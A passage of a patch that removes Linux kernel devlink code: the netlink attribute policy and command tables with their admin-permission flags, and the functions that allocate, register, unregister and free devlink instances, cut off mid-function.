+-	[DEVLINK_ATTR_REGION_CHUNK_LEN] = { .type = NLA_U64 },
+-	[DEVLINK_ATTR_HEALTH_REPORTER_NAME] = { .type = NLA_NUL_STRING },
+-	[DEVLINK_ATTR_HEALTH_REPORTER_GRACEFUL_PERIOD] = { .type = NLA_U64 },
+-	[DEVLINK_ATTR_HEALTH_REPORTER_AUTO_RECOVER] = { .type = NLA_U8 },
+-	[DEVLINK_ATTR_FLASH_UPDATE_FILE_NAME] = { .type = NLA_NUL_STRING },
+-	[DEVLINK_ATTR_FLASH_UPDATE_COMPONENT] = { .type = NLA_NUL_STRING },
+-	[DEVLINK_ATTR_FLASH_UPDATE_OVERWRITE_MASK] =
+-		NLA_POLICY_BITFIELD32(DEVLINK_SUPPORTED_FLASH_OVERWRITE_SECTIONS),
+-	[DEVLINK_ATTR_TRAP_NAME] = { .type = NLA_NUL_STRING },
+-	[DEVLINK_ATTR_TRAP_ACTION] = { .type = NLA_U8 },
+-	[DEVLINK_ATTR_TRAP_GROUP_NAME] = { .type = NLA_NUL_STRING },
+-	[DEVLINK_ATTR_NETNS_PID] = { .type = NLA_U32 },
+-	[DEVLINK_ATTR_NETNS_FD] = { .type = NLA_U32 },
+-	[DEVLINK_ATTR_NETNS_ID] = { .type = NLA_U32 },
+-	[DEVLINK_ATTR_HEALTH_REPORTER_AUTO_DUMP] = { .type = NLA_U8 },
+-	[DEVLINK_ATTR_TRAP_POLICER_ID] = { .type = NLA_U32 },
+-	[DEVLINK_ATTR_TRAP_POLICER_RATE] = { .type = NLA_U64 },
+-	[DEVLINK_ATTR_TRAP_POLICER_BURST] = { .type = NLA_U64 },
+-	[DEVLINK_ATTR_PORT_FUNCTION] = { .type = NLA_NESTED },
+-	[DEVLINK_ATTR_RELOAD_ACTION] = NLA_POLICY_RANGE(NLA_U8, DEVLINK_RELOAD_ACTION_DRIVER_REINIT,
+-							DEVLINK_RELOAD_ACTION_MAX),
+-	[DEVLINK_ATTR_RELOAD_LIMITS] = NLA_POLICY_BITFIELD32(DEVLINK_RELOAD_LIMITS_VALID_MASK),
+-	[DEVLINK_ATTR_PORT_FLAVOUR] = { .type = NLA_U16 },
+-	[DEVLINK_ATTR_PORT_PCI_PF_NUMBER] = { .type = NLA_U16 },
+-	[DEVLINK_ATTR_PORT_PCI_SF_NUMBER] = { .type = NLA_U32 },
+-	[DEVLINK_ATTR_PORT_CONTROLLER_NUMBER] = { .type = NLA_U32 },
+-	[DEVLINK_ATTR_RATE_TYPE] = { .type = NLA_U16 },
+-	[DEVLINK_ATTR_RATE_TX_SHARE] = { .type = NLA_U64 },
+-	[DEVLINK_ATTR_RATE_TX_MAX] = { .type = NLA_U64 },
+-	[DEVLINK_ATTR_RATE_NODE_NAME] = { .type = NLA_NUL_STRING },
+-	[DEVLINK_ATTR_RATE_PARENT_NODE_NAME] = { .type = NLA_NUL_STRING },
+-	[DEVLINK_ATTR_LINECARD_INDEX] = { .type = NLA_U32 },
+-	[DEVLINK_ATTR_LINECARD_TYPE] = { .type = NLA_NUL_STRING },
+-	[DEVLINK_ATTR_SELFTESTS] = { .type = NLA_NESTED },
+-};
+-
+-static const struct genl_small_ops devlink_nl_ops[] = {
+-	{
+-		.cmd = DEVLINK_CMD_GET,
+-		.validate = GENL_DONT_VALIDATE_STRICT | GENL_DONT_VALIDATE_DUMP,
+-		.doit = devlink_nl_cmd_get_doit,
+-		.dumpit = devlink_nl_cmd_get_dumpit,
+-		/* can be retrieved by unprivileged users */
+-	},
+-	{
+-		.cmd = DEVLINK_CMD_PORT_GET,
+-		.validate = GENL_DONT_VALIDATE_STRICT | GENL_DONT_VALIDATE_DUMP,
+-		.doit = devlink_nl_cmd_port_get_doit,
+-		.dumpit = devlink_nl_cmd_port_get_dumpit,
+-		.internal_flags = DEVLINK_NL_FLAG_NEED_PORT,
+-		/* can be retrieved by unprivileged users */
+-	},
+-	{
+-		.cmd = DEVLINK_CMD_PORT_SET,
+-		.validate = GENL_DONT_VALIDATE_STRICT | GENL_DONT_VALIDATE_DUMP,
+-		.doit = devlink_nl_cmd_port_set_doit,
+-		.flags = GENL_ADMIN_PERM,
+-		.internal_flags = DEVLINK_NL_FLAG_NEED_PORT,
+-	},
+-	{
+-		.cmd = DEVLINK_CMD_RATE_GET,
+-		.doit = devlink_nl_cmd_rate_get_doit,
+-		.dumpit = devlink_nl_cmd_rate_get_dumpit,
+-		.internal_flags = DEVLINK_NL_FLAG_NEED_RATE,
+-		/* can be retrieved by unprivileged users */
+-	},
+-	{
+-		.cmd = DEVLINK_CMD_RATE_SET,
+-		.doit = devlink_nl_cmd_rate_set_doit,
+-		.flags = GENL_ADMIN_PERM,
+-		.internal_flags = DEVLINK_NL_FLAG_NEED_RATE,
+-	},
+-	{
+-		.cmd = DEVLINK_CMD_RATE_NEW,
+-		.doit = devlink_nl_cmd_rate_new_doit,
+-		.flags = GENL_ADMIN_PERM,
+-	},
+-	{
+-		.cmd = DEVLINK_CMD_RATE_DEL,
+-		.doit = devlink_nl_cmd_rate_del_doit,
+-		.flags = GENL_ADMIN_PERM,
+-		.internal_flags = DEVLINK_NL_FLAG_NEED_RATE_NODE,
+-	},
+-	{
+-		.cmd = DEVLINK_CMD_PORT_SPLIT,
+-		.validate = GENL_DONT_VALIDATE_STRICT | GENL_DONT_VALIDATE_DUMP,
+-		.doit = devlink_nl_cmd_port_split_doit,
+-		.flags = GENL_ADMIN_PERM,
+-		.internal_flags = DEVLINK_NL_FLAG_NEED_PORT,
+-	},
+-	{
+-		.cmd = DEVLINK_CMD_PORT_UNSPLIT,
+-		.validate = GENL_DONT_VALIDATE_STRICT | GENL_DONT_VALIDATE_DUMP,
+-		.doit = devlink_nl_cmd_port_unsplit_doit,
+-		.flags = GENL_ADMIN_PERM,
+-		.internal_flags = DEVLINK_NL_FLAG_NEED_PORT,
+-	},
+-	{
+-		.cmd = DEVLINK_CMD_PORT_NEW,
+-		.doit = devlink_nl_cmd_port_new_doit,
+-		.flags = GENL_ADMIN_PERM,
+-	},
+-	{
+-		.cmd = DEVLINK_CMD_PORT_DEL,
+-		.doit = devlink_nl_cmd_port_del_doit,
+-		.flags = GENL_ADMIN_PERM,
+-	},
+-	{
+-		.cmd = DEVLINK_CMD_LINECARD_GET,
+-		.doit = devlink_nl_cmd_linecard_get_doit,
+-		.dumpit = devlink_nl_cmd_linecard_get_dumpit,
+-		.internal_flags = DEVLINK_NL_FLAG_NEED_LINECARD,
+-		/* can be retrieved by unprivileged users */
+-	},
+-	{
+-		.cmd = DEVLINK_CMD_LINECARD_SET,
+-		.doit = devlink_nl_cmd_linecard_set_doit,
+-		.flags = GENL_ADMIN_PERM,
+-		.internal_flags = DEVLINK_NL_FLAG_NEED_LINECARD,
+-	},
+-	{
+-		.cmd = DEVLINK_CMD_SB_GET,
+-		.validate = GENL_DONT_VALIDATE_STRICT | GENL_DONT_VALIDATE_DUMP,
+-		.doit = devlink_nl_cmd_sb_get_doit,
+-		.dumpit = devlink_nl_cmd_sb_get_dumpit,
+-		/* can be retrieved by unprivileged users */
+-	},
+-	{
+-		.cmd = DEVLINK_CMD_SB_POOL_GET,
+-		.validate = GENL_DONT_VALIDATE_STRICT | GENL_DONT_VALIDATE_DUMP,
+-		.doit = devlink_nl_cmd_sb_pool_get_doit,
+-		.dumpit = devlink_nl_cmd_sb_pool_get_dumpit,
+-		/* can be retrieved by unprivileged users */
+-	},
+-	{
+-		.cmd = DEVLINK_CMD_SB_POOL_SET,
+-		.validate = GENL_DONT_VALIDATE_STRICT | GENL_DONT_VALIDATE_DUMP,
+-		.doit = devlink_nl_cmd_sb_pool_set_doit,
+-		.flags = GENL_ADMIN_PERM,
+-	},
+-	{
+-		.cmd = DEVLINK_CMD_SB_PORT_POOL_GET,
+-		.validate = GENL_DONT_VALIDATE_STRICT | GENL_DONT_VALIDATE_DUMP,
+-		.doit = devlink_nl_cmd_sb_port_pool_get_doit,
+-		.dumpit = devlink_nl_cmd_sb_port_pool_get_dumpit,
+-		.internal_flags = DEVLINK_NL_FLAG_NEED_PORT,
+-		/* can be retrieved by unprivileged users */
+-	},
+-	{
+-		.cmd = DEVLINK_CMD_SB_PORT_POOL_SET,
+-		.validate = GENL_DONT_VALIDATE_STRICT | GENL_DONT_VALIDATE_DUMP,
+-		.doit = devlink_nl_cmd_sb_port_pool_set_doit,
+-		.flags = GENL_ADMIN_PERM,
+-		.internal_flags = DEVLINK_NL_FLAG_NEED_PORT,
+-	},
+-	{
+-		.cmd = DEVLINK_CMD_SB_TC_POOL_BIND_GET,
+-		.validate = GENL_DONT_VALIDATE_STRICT | GENL_DONT_VALIDATE_DUMP,
+-		.doit = devlink_nl_cmd_sb_tc_pool_bind_get_doit,
+-		.dumpit = devlink_nl_cmd_sb_tc_pool_bind_get_dumpit,
+-		.internal_flags = DEVLINK_NL_FLAG_NEED_PORT,
+-		/* can be retrieved by unprivileged users */
+-	},
+-	{
+-		.cmd = DEVLINK_CMD_SB_TC_POOL_BIND_SET,
+-		.validate = GENL_DONT_VALIDATE_STRICT | GENL_DONT_VALIDATE_DUMP,
+-		.doit = devlink_nl_cmd_sb_tc_pool_bind_set_doit,
+-		.flags = GENL_ADMIN_PERM,
+-		.internal_flags = DEVLINK_NL_FLAG_NEED_PORT,
+-	},
+-	{
+-		.cmd = DEVLINK_CMD_SB_OCC_SNAPSHOT,
+-		.validate = GENL_DONT_VALIDATE_STRICT | GENL_DONT_VALIDATE_DUMP,
+-		.doit = devlink_nl_cmd_sb_occ_snapshot_doit,
+-		.flags = GENL_ADMIN_PERM,
+-	},
+-	{
+-		.cmd = DEVLINK_CMD_SB_OCC_MAX_CLEAR,
+-		.validate = GENL_DONT_VALIDATE_STRICT | GENL_DONT_VALIDATE_DUMP,
+-		.doit = devlink_nl_cmd_sb_occ_max_clear_doit,
+-		.flags = GENL_ADMIN_PERM,
+-	},
+-	{
+-		.cmd = DEVLINK_CMD_ESWITCH_GET,
+-		.validate = GENL_DONT_VALIDATE_STRICT | GENL_DONT_VALIDATE_DUMP,
+-		.doit = devlink_nl_cmd_eswitch_get_doit,
+-		.flags = GENL_ADMIN_PERM,
+-	},
+-	{
+-		.cmd = DEVLINK_CMD_ESWITCH_SET,
+-		.validate = GENL_DONT_VALIDATE_STRICT | GENL_DONT_VALIDATE_DUMP,
+-		.doit = devlink_nl_cmd_eswitch_set_doit,
+-		.flags = GENL_ADMIN_PERM,
+-	},
+-	{
+-		.cmd = DEVLINK_CMD_DPIPE_TABLE_GET,
+-		.validate = GENL_DONT_VALIDATE_STRICT | GENL_DONT_VALIDATE_DUMP,
+-		.doit = devlink_nl_cmd_dpipe_table_get,
+-		/* can be retrieved by unprivileged users */
+-	},
+-	{
+-		.cmd = DEVLINK_CMD_DPIPE_ENTRIES_GET,
+-		.validate = GENL_DONT_VALIDATE_STRICT | GENL_DONT_VALIDATE_DUMP,
+-		.doit = devlink_nl_cmd_dpipe_entries_get,
+-		/* can be retrieved by unprivileged users */
+-	},
+-	{
+-		.cmd = DEVLINK_CMD_DPIPE_HEADERS_GET,
+-		.validate = GENL_DONT_VALIDATE_STRICT | GENL_DONT_VALIDATE_DUMP,
+-		.doit = devlink_nl_cmd_dpipe_headers_get,
+-		/* can be retrieved by unprivileged users */
+-	},
+-	{
+-		.cmd = DEVLINK_CMD_DPIPE_TABLE_COUNTERS_SET,
+-		.validate = GENL_DONT_VALIDATE_STRICT | GENL_DONT_VALIDATE_DUMP,
+-		.doit = devlink_nl_cmd_dpipe_table_counters_set,
+-		.flags = GENL_ADMIN_PERM,
+-	},
+-	{
+-		.cmd = DEVLINK_CMD_RESOURCE_SET,
+-		.validate = GENL_DONT_VALIDATE_STRICT | GENL_DONT_VALIDATE_DUMP,
+-		.doit = devlink_nl_cmd_resource_set,
+-		.flags = GENL_ADMIN_PERM,
+-	},
+-	{
+-		.cmd = DEVLINK_CMD_RESOURCE_DUMP,
+-		.validate = GENL_DONT_VALIDATE_STRICT | GENL_DONT_VALIDATE_DUMP,
+-		.doit = devlink_nl_cmd_resource_dump,
+-		/* can be retrieved by unprivileged users */
+-	},
+-	{
+-		.cmd = DEVLINK_CMD_RELOAD,
+-		.validate = GENL_DONT_VALIDATE_STRICT | GENL_DONT_VALIDATE_DUMP,
+-		.doit = devlink_nl_cmd_reload,
+-		.flags = GENL_ADMIN_PERM,
+-	},
+-	{
+-		.cmd = DEVLINK_CMD_PARAM_GET,
+-		.validate = GENL_DONT_VALIDATE_STRICT | GENL_DONT_VALIDATE_DUMP,
+-		.doit = devlink_nl_cmd_param_get_doit,
+-		.dumpit = devlink_nl_cmd_param_get_dumpit,
+-		/* can be retrieved by unprivileged users */
+-	},
+-	{
+-		.cmd = DEVLINK_CMD_PARAM_SET,
+-		.validate = GENL_DONT_VALIDATE_STRICT | GENL_DONT_VALIDATE_DUMP,
+-		.doit = devlink_nl_cmd_param_set_doit,
+-		.flags = GENL_ADMIN_PERM,
+-	},
+-	{
+-		.cmd = DEVLINK_CMD_PORT_PARAM_GET,
+-		.validate = GENL_DONT_VALIDATE_STRICT | GENL_DONT_VALIDATE_DUMP,
+-		.doit = devlink_nl_cmd_port_param_get_doit,
+-		.dumpit = devlink_nl_cmd_port_param_get_dumpit,
+-		.internal_flags = DEVLINK_NL_FLAG_NEED_PORT,
+-		/* can be retrieved by unprivileged users */
+-	},
+-	{
+-		.cmd = DEVLINK_CMD_PORT_PARAM_SET,
+-		.validate = GENL_DONT_VALIDATE_STRICT | GENL_DONT_VALIDATE_DUMP,
+-		.doit = devlink_nl_cmd_port_param_set_doit,
+-		.flags = GENL_ADMIN_PERM,
+-		.internal_flags = DEVLINK_NL_FLAG_NEED_PORT,
+-	},
+-	{
+-		.cmd = DEVLINK_CMD_REGION_GET,
+-		.validate = GENL_DONT_VALIDATE_STRICT | GENL_DONT_VALIDATE_DUMP,
+-		.doit = devlink_nl_cmd_region_get_doit,
+-		.dumpit = devlink_nl_cmd_region_get_dumpit,
+-		.flags = GENL_ADMIN_PERM,
+-	},
+-	{
+-		.cmd = DEVLINK_CMD_REGION_NEW,
+-		.validate = GENL_DONT_VALIDATE_STRICT | GENL_DONT_VALIDATE_DUMP,
+-		.doit = devlink_nl_cmd_region_new,
+-		.flags = GENL_ADMIN_PERM,
+-	},
+-	{
+-		.cmd = DEVLINK_CMD_REGION_DEL,
+-		.validate = GENL_DONT_VALIDATE_STRICT | GENL_DONT_VALIDATE_DUMP,
+-		.doit = devlink_nl_cmd_region_del,
+-		.flags = GENL_ADMIN_PERM,
+-	},
+-	{
+-		.cmd = DEVLINK_CMD_REGION_READ,
+-		.validate = GENL_DONT_VALIDATE_STRICT |
+-			    GENL_DONT_VALIDATE_DUMP_STRICT,
+-		.dumpit = devlink_nl_cmd_region_read_dumpit,
+-		.flags = GENL_ADMIN_PERM,
+-	},
+-	{
+-		.cmd = DEVLINK_CMD_INFO_GET,
+-		.validate = GENL_DONT_VALIDATE_STRICT | GENL_DONT_VALIDATE_DUMP,
+-		.doit = devlink_nl_cmd_info_get_doit,
+-		.dumpit = devlink_nl_cmd_info_get_dumpit,
+-		/* can be retrieved by unprivileged users */
+-	},
+-	{
+-		.cmd = DEVLINK_CMD_HEALTH_REPORTER_GET,
+-		.validate = GENL_DONT_VALIDATE_STRICT | GENL_DONT_VALIDATE_DUMP,
+-		.doit = devlink_nl_cmd_health_reporter_get_doit,
+-		.dumpit = devlink_nl_cmd_health_reporter_get_dumpit,
+-		.internal_flags = DEVLINK_NL_FLAG_NEED_DEVLINK_OR_PORT,
+-		/* can be retrieved by unprivileged users */
+-	},
+-	{
+-		.cmd = DEVLINK_CMD_HEALTH_REPORTER_SET,
+-		.validate = GENL_DONT_VALIDATE_STRICT | GENL_DONT_VALIDATE_DUMP,
+-		.doit = devlink_nl_cmd_health_reporter_set_doit,
+-		.flags = GENL_ADMIN_PERM,
+-		.internal_flags = DEVLINK_NL_FLAG_NEED_DEVLINK_OR_PORT,
+-	},
+-	{
+-		.cmd = DEVLINK_CMD_HEALTH_REPORTER_RECOVER,
+-		.validate = GENL_DONT_VALIDATE_STRICT | GENL_DONT_VALIDATE_DUMP,
+-		.doit = devlink_nl_cmd_health_reporter_recover_doit,
+-		.flags = GENL_ADMIN_PERM,
+-		.internal_flags = DEVLINK_NL_FLAG_NEED_DEVLINK_OR_PORT,
+-	},
+-	{
+-		.cmd = DEVLINK_CMD_HEALTH_REPORTER_DIAGNOSE,
+-		.validate = GENL_DONT_VALIDATE_STRICT | GENL_DONT_VALIDATE_DUMP,
+-		.doit = devlink_nl_cmd_health_reporter_diagnose_doit,
+-		.flags = GENL_ADMIN_PERM,
+-		.internal_flags = DEVLINK_NL_FLAG_NEED_DEVLINK_OR_PORT,
+-	},
+-	{
+-		.cmd = DEVLINK_CMD_HEALTH_REPORTER_DUMP_GET,
+-		.validate = GENL_DONT_VALIDATE_STRICT |
+-			    GENL_DONT_VALIDATE_DUMP_STRICT,
+-		.dumpit = devlink_nl_cmd_health_reporter_dump_get_dumpit,
+-		.flags = GENL_ADMIN_PERM,
+-	},
+-	{
+-		.cmd = DEVLINK_CMD_HEALTH_REPORTER_DUMP_CLEAR,
+-		.validate = GENL_DONT_VALIDATE_STRICT | GENL_DONT_VALIDATE_DUMP,
+-		.doit = devlink_nl_cmd_health_reporter_dump_clear_doit,
+-		.flags = GENL_ADMIN_PERM,
+-		.internal_flags = DEVLINK_NL_FLAG_NEED_DEVLINK_OR_PORT,
+-	},
+-	{
+-		.cmd = DEVLINK_CMD_HEALTH_REPORTER_TEST,
+-		.validate = GENL_DONT_VALIDATE_STRICT | GENL_DONT_VALIDATE_DUMP,
+-		.doit = devlink_nl_cmd_health_reporter_test_doit,
+-		.flags = GENL_ADMIN_PERM,
+-		.internal_flags = DEVLINK_NL_FLAG_NEED_DEVLINK_OR_PORT,
+-	},
+-	{
+-		.cmd = DEVLINK_CMD_FLASH_UPDATE,
+-		.validate = GENL_DONT_VALIDATE_STRICT | GENL_DONT_VALIDATE_DUMP,
+-		.doit = devlink_nl_cmd_flash_update,
+-		.flags = GENL_ADMIN_PERM,
+-	},
+-	{
+-		.cmd = DEVLINK_CMD_TRAP_GET,
+-		.doit = devlink_nl_cmd_trap_get_doit,
+-		.dumpit = devlink_nl_cmd_trap_get_dumpit,
+-		/* can be retrieved by unprivileged users */
+-	},
+-	{
+-		.cmd = DEVLINK_CMD_TRAP_SET,
+-		.doit = devlink_nl_cmd_trap_set_doit,
+-		.flags = GENL_ADMIN_PERM,
+-	},
+-	{
+-		.cmd = DEVLINK_CMD_TRAP_GROUP_GET,
+-		.doit = devlink_nl_cmd_trap_group_get_doit,
+-		.dumpit = devlink_nl_cmd_trap_group_get_dumpit,
+-		/* can be retrieved by unprivileged users */
+-	},
+-	{
+-		.cmd = DEVLINK_CMD_TRAP_GROUP_SET,
+-		.doit = devlink_nl_cmd_trap_group_set_doit,
+-		.flags = GENL_ADMIN_PERM,
+-	},
+-	{
+-		.cmd = DEVLINK_CMD_TRAP_POLICER_GET,
+-		.doit = devlink_nl_cmd_trap_policer_get_doit,
+-		.dumpit = devlink_nl_cmd_trap_policer_get_dumpit,
+-		/* can be retrieved by unprivileged users */
+-	},
+-	{
+-		.cmd = DEVLINK_CMD_TRAP_POLICER_SET,
+-		.doit = devlink_nl_cmd_trap_policer_set_doit,
+-		.flags = GENL_ADMIN_PERM,
+-	},
+-	{
+-		.cmd = DEVLINK_CMD_SELFTESTS_GET,
+-		.doit = devlink_nl_cmd_selftests_get_doit,
+-		.dumpit = devlink_nl_cmd_selftests_get_dumpit
+-		/* can be retrieved by unprivileged users */
+-	},
+-	{
+-		.cmd = DEVLINK_CMD_SELFTESTS_RUN,
+-		.doit = devlink_nl_cmd_selftests_run,
+-		.flags = GENL_ADMIN_PERM,
+-	},
+-};
+-
+-static struct genl_family devlink_nl_family __ro_after_init = {
+-	.name		= DEVLINK_GENL_NAME,
+-	.version	= DEVLINK_GENL_VERSION,
+-	.maxattr	= DEVLINK_ATTR_MAX,
+-	.policy = devlink_nl_policy,
+-	.netnsok	= true,
+-	.parallel_ops	= true,
+-	.pre_doit	= devlink_nl_pre_doit,
+-	.post_doit	= devlink_nl_post_doit,
+-	.module		= THIS_MODULE,
+-	.small_ops	= devlink_nl_ops,
+-	.n_small_ops	= ARRAY_SIZE(devlink_nl_ops),
+-	.resv_start_op	= DEVLINK_CMD_SELFTESTS_RUN + 1,
+-	.mcgrps		= devlink_nl_mcgrps,
+-	.n_mcgrps	= ARRAY_SIZE(devlink_nl_mcgrps),
+-};
+-
+-static bool devlink_reload_actions_valid(const struct devlink_ops *ops)
+-{
+-	const struct devlink_reload_combination *comb;
+-	int i;
+-
+-	if (!devlink_reload_supported(ops)) {
+-		if (WARN_ON(ops->reload_actions))
+-			return false;
+-		return true;
+-	}
+-
+-	if (WARN_ON(!ops->reload_actions ||
+-		    ops->reload_actions & BIT(DEVLINK_RELOAD_ACTION_UNSPEC) ||
+-		    ops->reload_actions >= BIT(__DEVLINK_RELOAD_ACTION_MAX)))
+-		return false;
+-
+-	if (WARN_ON(ops->reload_limits & BIT(DEVLINK_RELOAD_LIMIT_UNSPEC) ||
+-		    ops->reload_limits >= BIT(__DEVLINK_RELOAD_LIMIT_MAX)))
+-		return false;
+-
+-	for (i = 0; i < ARRAY_SIZE(devlink_reload_invalid_combinations); i++)  {
+-		comb = &devlink_reload_invalid_combinations[i];
+-		if (ops->reload_actions == BIT(comb->action) &&
+-		    ops->reload_limits == BIT(comb->limit))
+-			return false;
+-	}
+-	return true;
+-}
+-
+-/**
+- *	devlink_set_features - Set devlink supported features
+- *
+- *	@devlink: devlink
+- *	@features: devlink support features
+- *
+- *	This interface allows us to set reload ops separatelly from
+- *	the devlink_alloc.
+- */
+-void devlink_set_features(struct devlink *devlink, u64 features)
+-{
+-	ASSERT_DEVLINK_NOT_REGISTERED(devlink);
+-
+-	WARN_ON(features & DEVLINK_F_RELOAD &&
+-		!devlink_reload_supported(devlink->ops));
+-	devlink->features = features;
+-}
+-EXPORT_SYMBOL_GPL(devlink_set_features);
+-
+-/**
+- *	devlink_alloc_ns - Allocate new devlink instance resources
+- *	in specific namespace
+- *
+- *	@ops: ops
+- *	@priv_size: size of user private data
+- *	@net: net namespace
+- *	@dev: parent device
+- *
+- *	Allocate new devlink instance resources, including devlink index
+- *	and name.
+- */
+-struct devlink *devlink_alloc_ns(const struct devlink_ops *ops,
+-				 size_t priv_size, struct net *net,
+-				 struct device *dev)
+-{
+-	struct devlink *devlink;
+-	static u32 last_id;
+-	int ret;
+-
+-	WARN_ON(!ops || !dev);
+-	if (!devlink_reload_actions_valid(ops))
+-		return NULL;
+-
+-	devlink = kzalloc(sizeof(*devlink) + priv_size, GFP_KERNEL);
+-	if (!devlink)
+-		return NULL;
+-
+-	ret = xa_alloc_cyclic(&devlinks, &devlink->index, devlink, xa_limit_31b,
+-			      &last_id, GFP_KERNEL);
+-	if (ret < 0) {
+-		kfree(devlink);
+-		return NULL;
+-	}
+-
+-	devlink->dev = dev;
+-	devlink->ops = ops;
+-	xa_init_flags(&devlink->snapshot_ids, XA_FLAGS_ALLOC);
+-	write_pnet(&devlink->_net, net);
+-	INIT_LIST_HEAD(&devlink->port_list);
+-	INIT_LIST_HEAD(&devlink->rate_list);
+-	INIT_LIST_HEAD(&devlink->linecard_list);
+-	INIT_LIST_HEAD(&devlink->sb_list);
+-	INIT_LIST_HEAD_RCU(&devlink->dpipe_table_list);
+-	INIT_LIST_HEAD(&devlink->resource_list);
+-	INIT_LIST_HEAD(&devlink->param_list);
+-	INIT_LIST_HEAD(&devlink->region_list);
+-	INIT_LIST_HEAD(&devlink->reporter_list);
+-	INIT_LIST_HEAD(&devlink->trap_list);
+-	INIT_LIST_HEAD(&devlink->trap_group_list);
+-	INIT_LIST_HEAD(&devlink->trap_policer_list);
+-	lockdep_register_key(&devlink->lock_key);
+-	mutex_init(&devlink->lock);
+-	lockdep_set_class(&devlink->lock, &devlink->lock_key);
+-	mutex_init(&devlink->reporters_lock);
+-	mutex_init(&devlink->linecards_lock);
+-	refcount_set(&devlink->refcount, 1);
+-	init_completion(&devlink->comp);
+-
+-	return devlink;
+-}
+-EXPORT_SYMBOL_GPL(devlink_alloc_ns);
+-
+-static void
+-devlink_trap_policer_notify(struct devlink *devlink,
+-			    const struct devlink_trap_policer_item *policer_item,
+-			    enum devlink_command cmd);
+-static void
+-devlink_trap_group_notify(struct devlink *devlink,
+-			  const struct devlink_trap_group_item *group_item,
+-			  enum devlink_command cmd);
+-static void devlink_trap_notify(struct devlink *devlink,
+-				const struct devlink_trap_item *trap_item,
+-				enum devlink_command cmd);
+-
+-static void devlink_notify_register(struct devlink *devlink)
+-{
+-	struct devlink_trap_policer_item *policer_item;
+-	struct devlink_trap_group_item *group_item;
+-	struct devlink_param_item *param_item;
+-	struct devlink_trap_item *trap_item;
+-	struct devlink_port *devlink_port;
+-	struct devlink_linecard *linecard;
+-	struct devlink_rate *rate_node;
+-	struct devlink_region *region;
+-
+-	devlink_notify(devlink, DEVLINK_CMD_NEW);
+-	list_for_each_entry(linecard, &devlink->linecard_list, list)
+-		devlink_linecard_notify(linecard, DEVLINK_CMD_LINECARD_NEW);
+-
+-	list_for_each_entry(devlink_port, &devlink->port_list, list)
+-		devlink_port_notify(devlink_port, DEVLINK_CMD_PORT_NEW);
+-
+-	list_for_each_entry(policer_item, &devlink->trap_policer_list, list)
+-		devlink_trap_policer_notify(devlink, policer_item,
+-					    DEVLINK_CMD_TRAP_POLICER_NEW);
+-
+-	list_for_each_entry(group_item, &devlink->trap_group_list, list)
+-		devlink_trap_group_notify(devlink, group_item,
+-					  DEVLINK_CMD_TRAP_GROUP_NEW);
+-
+-	list_for_each_entry(trap_item, &devlink->trap_list, list)
+-		devlink_trap_notify(devlink, trap_item, DEVLINK_CMD_TRAP_NEW);
+-
+-	list_for_each_entry(rate_node, &devlink->rate_list, list)
+-		devlink_rate_notify(rate_node, DEVLINK_CMD_RATE_NEW);
+-
+-	list_for_each_entry(region, &devlink->region_list, list)
+-		devlink_nl_region_notify(region, NULL, DEVLINK_CMD_REGION_NEW);
+-
+-	list_for_each_entry(param_item, &devlink->param_list, list)
+-		devlink_param_notify(devlink, 0, param_item,
+-				     DEVLINK_CMD_PARAM_NEW);
+-}
+-
+-static void devlink_notify_unregister(struct devlink *devlink)
+-{
+-	struct devlink_trap_policer_item *policer_item;
+-	struct devlink_trap_group_item *group_item;
+-	struct devlink_param_item *param_item;
+-	struct devlink_trap_item *trap_item;
+-	struct devlink_port *devlink_port;
+-	struct devlink_rate *rate_node;
+-	struct devlink_region *region;
+-
+-	list_for_each_entry_reverse(param_item, &devlink->param_list, list)
+-		devlink_param_notify(devlink, 0, param_item,
+-				     DEVLINK_CMD_PARAM_DEL);
+-
+-	list_for_each_entry_reverse(region, &devlink->region_list, list)
+-		devlink_nl_region_notify(region, NULL, DEVLINK_CMD_REGION_DEL);
+-
+-	list_for_each_entry_reverse(rate_node, &devlink->rate_list, list)
+-		devlink_rate_notify(rate_node, DEVLINK_CMD_RATE_DEL);
+-
+-	list_for_each_entry_reverse(trap_item, &devlink->trap_list, list)
+-		devlink_trap_notify(devlink, trap_item, DEVLINK_CMD_TRAP_DEL);
+-
+-	list_for_each_entry_reverse(group_item, &devlink->trap_group_list, list)
+-		devlink_trap_group_notify(devlink, group_item,
+-					  DEVLINK_CMD_TRAP_GROUP_DEL);
+-	list_for_each_entry_reverse(policer_item, &devlink->trap_policer_list,
+-				    list)
+-		devlink_trap_policer_notify(devlink, policer_item,
+-					    DEVLINK_CMD_TRAP_POLICER_DEL);
+-
+-	list_for_each_entry_reverse(devlink_port, &devlink->port_list, list)
+-		devlink_port_notify(devlink_port, DEVLINK_CMD_PORT_DEL);
+-	devlink_notify(devlink, DEVLINK_CMD_DEL);
+-}
+-
+-/**
+- *	devlink_register - Register devlink instance
+- *
+- *	@devlink: devlink
+- */
+-void devlink_register(struct devlink *devlink)
+-{
+-	ASSERT_DEVLINK_NOT_REGISTERED(devlink);
+-	/* Make sure that we are in .probe() routine */
+-
+-	xa_set_mark(&devlinks, devlink->index, DEVLINK_REGISTERED);
+-	devlink_notify_register(devlink);
+-}
+-EXPORT_SYMBOL_GPL(devlink_register);
+-
+-/**
+- *	devlink_unregister - Unregister devlink instance
+- *
+- *	@devlink: devlink
+- */
+-void devlink_unregister(struct devlink *devlink)
+-{
+-	ASSERT_DEVLINK_REGISTERED(devlink);
+-	/* Make sure that we are in .remove() routine */
+-
+-	xa_set_mark(&devlinks, devlink->index, DEVLINK_UNREGISTERING);
+-	devlink_put(devlink);
+-	wait_for_completion(&devlink->comp);
+-
+-	devlink_notify_unregister(devlink);
+-	xa_clear_mark(&devlinks, devlink->index, DEVLINK_REGISTERED);
+-	xa_clear_mark(&devlinks, devlink->index, DEVLINK_UNREGISTERING);
+-}
+-EXPORT_SYMBOL_GPL(devlink_unregister);
+-
+-/**
+- *	devlink_free - Free devlink instance resources
+- *
+- *	@devlink: devlink
+- */
+-void devlink_free(struct devlink *devlink)
+-{
+-	ASSERT_DEVLINK_NOT_REGISTERED(devlink);
+-
+-	mutex_destroy(&devlink->linecards_lock);
+-	mutex_destroy(&devlink->reporters_lock);
+-	mutex_destroy(&devlink->lock);
+-	lockdep_unregister_key(&devlink->lock_key);
+-	WARN_ON(!list_empty(&devlink->trap_policer_list));
+-	WARN_ON(!list_empty(&devlink->trap_group_list));
+-	WARN_ON(!list_empty(&devlink->trap_list));
+-	WARN_ON(!list_empty(&devlink->reporter_list));
+-	WARN_ON(!list_empty(&devlink->region_list));
+-	WARN_ON(!list_empty(&devlink->param_list));
